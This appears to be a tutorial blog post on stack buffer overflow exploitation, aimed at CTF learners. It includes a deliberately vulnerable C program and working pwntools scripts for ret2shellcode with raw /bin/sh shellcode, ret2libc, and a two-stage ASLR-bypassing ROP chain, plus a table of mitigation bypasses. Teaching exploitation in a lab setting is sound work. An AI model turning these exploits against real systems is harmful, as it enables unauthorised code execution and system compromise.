# Stack Buffer Overflows: From Crash to Shell

Buffer overflows are the grandfather of memory corruption vulnerabilities. They are decades old and largely mitigated in modern software, but understanding them is foundational: they appear in CTFs constantly, they still exist in embedded firmware and legacy systems, and most other exploitation techniques build on the concepts here.

This post assumes basic C knowledge and Linux familiarity. We'll go from a vulnerable program to a shell running with the privileges of the vulnerable process (a root shell only if that process runs as root).

## The stack, briefly

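The call stack is a region of memory used to manage function calls. Each call creates a stack frame: the call instruction pushes the return address, and the function's prologue saves the caller's base pointer and reserves space for local variables: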

terminal

High addresses
┌──────────────────────┐
│    caller's data     │
├──────────────────────┤
│   return address     │  ← where execution returns after the function
├──────────────────────┤
│    saved EBP/RBP     │  ← caller's base pointer
├──────────────────────┤
│   local variables    │  ← including buffers
│       ...            │
└──────────────────────┘
Low addresses (stack grows down)

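When gets() or strcpy() writes more data than a buffer can hold, the extra bytes spill into higher addresses: first any other locals and the saved base pointer, then the saved return address. When the function returns, the CPU jumps to the attacker-supplied address instead of back to the original caller.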
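
To make the overwrite concrete, here is a minimal Python model of a stack frame. It is only a sketch: the layout (buffer, then saved EBP, then return address, with no padding) and the example addresses are assumptions for illustration, and real compilers often place padding or saved registers in between.

```python
import struct

BUF_SIZE = 64

def make_frame(saved_ebp, ret_addr):
    """Simplified frame, lowest address first: buf | saved EBP | return address."""
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, ret_addr)

def unchecked_copy(frame, data):
    """Mimic gets(): write every input byte starting at buf[0], with no length check."""
    for i, byte in enumerate(data):
        frame[i] = byte

def return_address(frame):
    """Read the 32-bit little-endian return address stored after buf and saved EBP."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]

# Hypothetical values chosen only for the demonstration.
frame = make_frame(saved_ebp=0xFFFFD508, ret_addr=0x080491C6)
before = return_address(frame)

# 64 bytes fill buf, 4 more clobber saved EBP, and the last 4 replace the return address.
unchecked_copy(frame, b"A" * 68 + struct.pack("<I", 0xDEADBEEF))
after = return_address(frame)

print(hex(before), "->", hex(after))
```

The model has no notion of execution; it only shows that a write with no bounds check reaches the return address once it runs past the end of the buffer.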

## Vulnerable program

terminal

// vuln.c
#include <stdio.h>
#include <string.h>

void vuln() {
    char buf[64];
    gets(buf);  // never use gets() — no bounds checking
    printf("You said: %s\n", buf);
}

int main() {
    vuln();
    return 0;
}

Compile with mitigations disabled (for learning):

terminal

gcc -m32 -fno-stack-protector -z execstack -no-pie -o vuln vuln.c
# -m32: 32-bit for simpler addresses
# -fno-stack-protector: no canary
# -z execstack: stack is executable
# -no-pie: fixed addresses (no ASLR at binary level)

## Step 1: Find the crash

terminal

python3 -c "print('A' * 100)" | ./vuln
# Segmentation fault

Now use a cyclic pattern to find exactly which offset overwrites EIP:

terminal

# Using pwntools
python3 -c "from pwn import *; print(cyclic(200).decode())" | ./vuln
# Segfault

# Find the offset from the crash address
dmesg | tail -1  # shows the faulting address, e.g., 0x61616174 (dmesg may need sudo)
python3 -c "from pwn import *; print(cyclic_find(0x61616174))"
# Output: 76, so EIP is overwritten at offset 76
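
For readers curious why a cyclic pattern pins down the offset, here is a stdlib-only sketch of the idea. It generates a de Bruijn sequence, in which every 4-byte window is unique, and searches it for the bytes that landed in EIP. It assumes the lowercase alphabet and 4-byte window that pwntools uses by default; the function names are my own, not pwntools APIs.

```python
import struct
from itertools import islice

def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence: every length-n window over the alphabet occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def pattern(length):
    """First `length` bytes of the sequence over a-z with 4-byte windows."""
    return bytes(islice(de_bruijn(b"abcdefghijklmnopqrstuvwxyz", 4), length))

def find_offset(value, length=200):
    """Locate a 32-bit register value (as read from a crash) inside the pattern."""
    return pattern(length).find(struct.pack("<I", value))

print(pattern(20))              # b'aaaabaaacaaadaaaeaaa'
print(find_offset(0x61616174))  # 76
```

The register value is packed little-endian before searching because that is the byte order in which the pattern was laid out in memory.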

Manually with GDB:

terminal

gdb ./vuln
(gdb) run < <(python3 -c "print('A'*100)")
(gdb) info registers eip
# eip = 0x41414141 (four A's — confirmed control of EIP)

## Step 2: Control EIP

terminal

# exploit.py
from pwn import *

offset = 76
payload = b"A" * offset + b"B" * 4  # B's will overwrite EIP

p = process("./vuln")
p.sendline(payload)
p.interactive()

terminal

python3 exploit.py
# The process crashes; dmesg | tail -1 should now report the fault at 0x42424242 (four B's)

## Step 3: ret2shellcode (NX disabled)

When the stack is executable (-z execstack), we can place shellcode in the buffer and jump to it.

Shellcode for a /bin/sh shell (32-bit Linux):

terminal

from pwn import *

context.arch = 'i386'
context.os = 'linux'

shellcode = asm(shellcraft.sh())
# Or use pre-written shellcode:
# shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

offset = 76

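# Find the buffer address in GDB (ASLR must be off for it to stay constant):
# (gdb) break vuln
# (gdb) run
# (gdb) x/32wx $esp  # after gets() has returned, look for where your input lands
# (gdb) p &buf       # gets the address directly, but only if the binary was built with -g
buf_addr = 0xffffd4a0  # example address of buf[]; yours will differ and can shift slightly outside GDB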

payload = shellcode
payload += b"A" * (offset - len(shellcode))  # padding
payload += p32(buf_addr)  # overwrite EIP with start of our shellcode

p = process("./vuln")
p.sendline(payload)
p.interactive()

This technique is blocked by NX (non-executable stack). Most modern systems have NX enabled.
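
The payload layout above can be checked offline. The sketch below rebuilds it with the standard library's struct module instead of pwntools, using the pre-written shellcode and the example buffer address from this section. The helper name is hypothetical. It also rejects newline bytes, since gets() stops reading at the first newline.

```python
import struct

# The 23-byte execve("/bin/sh") shellcode quoted in the listing above.
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

def build_payload(shellcode, offset, buf_addr):
    """Lay out shellcode | padding | return address for a gets()-style overflow."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    payload = shellcode + b"A" * (offset - len(shellcode)) + struct.pack("<I", buf_addr)
    if b"\n" in payload:
        raise ValueError("payload contains a newline; gets() would stop reading there")
    return payload

payload = build_payload(SHELLCODE, offset=76, buf_addr=0xFFFFD4A0)
print(len(payload))          # 80
print(payload[76:].hex())    # a0d4ffff
```

If the buffer address itself happens to contain the byte 0x0a, the check fails, and the usual workaround is to return to a slightly different address inside the buffer.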

## Step 4: ret2libc (NX enabled)

When the stack isn't executable, we can't run shellcode there, but we can call existing executable code. libc contains both system() and the string "/bin/sh", so all we need is the address of each.

terminal

# Find system() address (libc is only mapped once the program has started)
gdb ./vuln
(gdb) break main
(gdb) run
(gdb) p system
# $1 = {<text variable, no debug info>} 0xf7e3d200 <system>

# Find "/bin/sh" in libc
(gdb) find &system, +999999, "/bin/sh"
# 0xf7f569e8  <-- address of "/bin/sh" string in libc

Or from the shell:

terminal

ldd ./vuln | grep libc
# libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7c00000)

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system@@"
# Returns offset of system() from libc base

strings -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
# Returns offset of /bin/sh string
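
Turning those offsets into usable addresses is a single addition per symbol. In the sketch below the base is the one shown in the ldd output above, while both offsets are hypothetical placeholders: substitute whatever readelf and strings print for your libc. The base is only stable across runs when ASLR is disabled.

```python
LIBC_BASE = 0xF7C00000      # from the ldd output above

# Hypothetical offsets: replace with the values readelf and strings report.
SYSTEM_OFFSET = 0x0004C910
BINSH_OFFSET = 0x001B5FC8

def resolve(base, offset):
    """Absolute address of a libc symbol or string once the load base is known."""
    if base & 0xFFF:
        raise ValueError("a library base should be page-aligned")
    return base + offset

system_addr = resolve(LIBC_BASE, SYSTEM_OFFSET)
binsh_addr = resolve(LIBC_BASE, BINSH_OFFSET)
print(hex(system_addr), hex(binsh_addr))
```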

Build the payload:

terminal

from pwn import *

offset = 76

# Hardcoded example addresses (require ASLR off: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space)
system_addr = 0xf7e3d200
exit_addr   = 0xf7e2e1d0   # return addr after system() — use exit() to clean up
binsh_addr  = 0xf7f569e8

# Stack layout after overflow:
# [padding][EIP=system][return_after_system=exit][arg_to_system=/bin/sh]
payload = b"A" * offset
payload += p32(system_addr)
payload += p32(exit_addr)
payload += p32(binsh_addr)

p = process("./vuln")
p.sendline(payload)
p.interactive()
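
The order of the three words matters because of the 32-bit cdecl calling convention: on entry, a function expects its return address at [esp] and its first argument at [esp+4]. The stdlib-only sketch below rebuilds the same payload with the example addresses from the listing and prints what system() would see. The helper name is hypothetical.

```python
import struct

OFFSET = 76
# Example addresses from the listing above; they differ on every system.
SYSTEM, EXIT, BINSH = 0xF7E3D200, 0xF7E2E1D0, 0xF7F569E8

payload = b"A" * OFFSET + struct.pack("<III", SYSTEM, EXIT, BINSH)

def view_at_entry(payload, offset):
    """Show what system() finds on the stack after vuln()'s ret has popped its address."""
    eip, ret_after, first_arg = struct.unpack_from("<III", payload, offset)
    return {"eip": eip, "[esp]": ret_after, "[esp+4]": first_arg}

view = view_at_entry(payload, OFFSET)
for name, value in view.items():
    print(f"{name:8} = {value:#010x}")
```

Because vuln() returned with ret rather than reaching system() through call, nothing pushed a return address for system(). The exit() word fills that slot by hand.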

## Step 5: ROP chains (ASLR + NX)

When ASLR randomises libc's base address, we can't hardcode system(). We need to:

>Leak a libc address at runtime to find the real base
>Calculate the addresses of system() and "/bin/sh" from that base
>Build a ROP chain that calls system("/bin/sh")

ROP (Return-Oriented Programming) chains together small code sequences ending in ret ("gadgets") to build arbitrary computation from existing executable code.
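
A toy interpreter can show how a chain of addresses turns into behaviour. The sketch below models just two things: a `pop rdi; ret` gadget and a call target standing in for system(). All addresses are made up for the model, and it is not an emulator, only an illustration of how each ret consumes the next word on the stack.

```python
import struct

# Hypothetical addresses, chosen only for this toy model.
POP_RDI_RET = 0x401233
SYSTEM = 0x7FFFF7E50D70
BINSH = 0x7FFFF7FD8678

def run_chain(chain):
    """Interpret a ROP chain the way a series of ret instructions would."""
    stack = list(struct.unpack(f"<{len(chain) // 8}Q", chain))
    regs = {"rdi": 0}
    calls = []
    while stack:
        target = stack.pop(0)               # ret: pop the next word into RIP
        if target == POP_RDI_RET:
            regs["rdi"] = stack.pop(0)      # pop rdi: consume the following word
        elif target == SYSTEM:
            calls.append(("system", regs["rdi"]))
            break                           # the model stops once system() is reached
        else:
            raise ValueError(f"no gadget modelled at {target:#x}")
    return regs, calls

chain = struct.pack("<QQQ", POP_RDI_RET, BINSH, SYSTEM)
regs, calls = run_chain(chain)
print(hex(regs["rdi"]), calls[0][0])
```

The chain mixes code addresses and data on the same stack: the gadget decides which words are arguments and which are the next place to jump.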

terminal

# Find gadgets with ROPgadget
ROPgadget --binary ./vuln --only "pop|ret"

# Or with ropper
ropper -f ./vuln --search "pop eax; ret"

A full ROP chain for 64-bit with ASLR is more involved: it uses puts() to leak a libc address, calculates the libc base, then calls system("/bin/sh").

terminal

from pwn import *

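elf = ELF("./vuln64")  # assumed: built non-PIE, without a canary, and importing puts()
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
rop = ROP(elf)

offset = 72  # typical for char buf[64] on x86-64; confirm with a cyclic pattern as in Step 1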

# Stage 1: leak puts@got to find libc base
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]

stage1 = b"A" * offset
stage1 += p64(pop_rdi)
stage1 += p64(elf.got['puts'])     # arg: address of puts in GOT
stage1 += p64(elf.plt['puts'])     # call puts(puts_got) — leaks libc addr
stage1 += p64(elf.sym['main'])     # return to main for stage 2

p = process("./vuln64")
p.sendline(stage1)

# Parse the leaked address
p.recvuntil(b"You said: ")
p.recvline()  # discard the echoed payload (the A's plus the first gadget's address bytes)
leak = u64(p.recvline()[:6].ljust(8, b'\x00'))
libc.address = leak - libc.sym['puts']
log.info(f"libc base: {libc.address:#x}")

# Stage 2: now call system("/bin/sh")
# (ret gadget for stack alignment on 64-bit)
ret = rop.find_gadget(['ret'])[0]

stage2 = b"A" * offset
stage2 += p64(ret)                       # align stack (required on 64-bit)
stage2 += p64(pop_rdi)
stage2 += p64(next(libc.search(b'/bin/sh\x00')))
stage2 += p64(libc.sym['system'])

p.sendline(stage2)
p.interactive()
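
The leak arithmetic from stage 1 can be checked offline. The sketch below uses only the standard library, and both the leaked pointer and the puts offset are hypothetical values picked for illustration. It pads the 6 bytes that puts() prints back to 8, subtracts the symbol's offset, and verifies that the result is page-aligned, which is a cheap way to catch a wrong libc or a truncated leak.

```python
import struct

def parse_leak(raw):
    """Turn the bytes printed by puts() into an integer address.

    puts() stops at the first NUL byte, so a 48-bit user-space pointer arrives
    as 6 bytes and must be padded back to 8 before unpacking.
    """
    return struct.unpack("<Q", raw[:6].ljust(8, b"\x00"))[0]

def libc_base(leaked_puts, puts_offset):
    """Subtract the symbol's offset from its runtime address to get the load base."""
    base = leaked_puts - puts_offset
    if base & 0xFFF:
        raise ValueError("base is not page-aligned; wrong libc or a bad leak")
    return base

# Hypothetical values for illustration only.
PUTS_OFFSET = 0x80E50
raw = struct.pack("<Q", 0x7F1234A80E50)[:6] + b"\n"   # what recvline() would return

leak = parse_leak(raw)
base = libc_base(leak, PUTS_OFFSET)
print(hex(leak), hex(base))
```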

## Modern mitigations and what breaks them

| Mitigation | What it does | How to bypass |
|---|---|---|
| Stack canary | Random value placed before the return address and checked before the function returns | Leak the canary (e.g., via a format string), brute-force it on forking servers, or use a write that reaches the return address without crossing the canary |
| NX / DEP | Stack and heap are not executable | ret2libc, ROP chains |
| ASLR | Randomises load addresses | Leak addresses at runtime, brute force (32-bit has limited entropy), heap spraying |
| PIE | Binary itself is ASLR'd | Leak a binary address, then compute all offsets |
| RELRO (Full) | GOT is read-only | GOT overwrites no longer work; target other writable data such as return addresses or function pointers |
| SafeStack | Keeps return addresses on a separate protected stack | Rarely deployed and requires compiler support |
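
The canary row can be illustrated with a toy frame model. This is a sketch under assumptions: the layout (buffer, canary, saved EBP, return address) is simplified, the addresses are made up, and the canary is modelled with a NUL low byte in the style glibc uses. It shows why a blind linear overflow is caught while one that writes a leaked canary back in place is not.

```python
import os
import struct

BUF_SIZE = 64

def make_frame(canary, ret_addr):
    """Simplified frame, lowest address first: buf | canary | saved EBP | return address."""
    return bytearray(BUF_SIZE) + canary + struct.pack("<II", 0, ret_addr)

def write(frame, data):
    """Unchecked copy into the frame starting at buf[0]."""
    for i, byte in enumerate(data):
        frame[i] = byte

def canary_intact(frame, canary):
    """Model of the check the compiler inserts before the function returns."""
    return bytes(frame[BUF_SIZE:BUF_SIZE + 4]) == canary

canary = b"\x00" + os.urandom(3)           # assumed shape: NUL low byte plus random bytes
new_ret = struct.pack("<I", 0xDEADBEEF)

blind = make_frame(canary, 0x080491C6)
write(blind, b"A" * 72 + new_ret)          # linear overflow tramples the canary

informed = make_frame(canary, 0x080491C6)
write(informed, b"A" * 64 + canary + b"B" * 4 + new_ret)   # leaked canary written back

print(canary_intact(blind, canary), canary_intact(informed, canary))  # False True
```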

Bypassing all of these simultaneously (Full RELRO + Canary + NX + ASLR + PIE) usually requires chaining several vulnerabilities or primitives. The typical path is: leak the canary and a binary/libc address via a format string → compute the bases → ROP to one_gadget (a single libc gadget that spawns a shell when its constraints are met).

## Essential tools

| Tool | Use |
|---|---|
| pwntools | Python library for exploit development |
| GDB + pwndbg | Dynamic analysis with memory inspection |
| ROPgadget / ropper | Find ROP gadgets |
| checksec | Check binary protections |
| one_gadget | Find magic gadgets in libc that exec a shell |
| patchelf | Change a binary's linked libc for local testing |

terminal

checksec --file=./vuln
# Output shows: Canary, NX, PIE, RELRO status

Buffer overflows in 2025 are largely a solved problem in new software — but the exploitation techniques they teach are the foundation of every heap exploit, kernel pwn, and browser bug that still exists. If you're on the CTF track, start here.
